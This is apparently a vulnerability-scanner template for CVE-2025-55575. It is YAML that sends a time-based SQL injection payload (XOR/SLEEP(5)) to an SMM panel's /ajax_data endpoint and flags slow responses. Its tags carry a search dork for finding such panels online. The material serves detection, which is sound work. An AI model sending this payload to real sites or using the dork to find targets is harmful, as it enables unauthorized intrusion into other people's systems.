README.md
README.md not found for CVE-2025-55575. The file may not exist in the repository.
id: smm-panel-sqli
info:
name: Time-based SQL Injection Detection
author: aether
severity: critical
description: |
Detects a time-based SQL Injection vulnerability in the `service_detail` parameter via a POST request.
tags: sqli, mysql, timing,dork:'intitle:"#1 SMM Panel ****"' "smm panel"
reference:
- https://owasp.org/www-community/attacks/SQL_Injection
requests:
- method: POST
path:
- "{{BaseURL}}/ajax_data"
headers:
Content-Type: "application/x-www-form-urlencoded"
body: "action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z"
matchers:
- type: dsl
dsl:
- "duration > 5"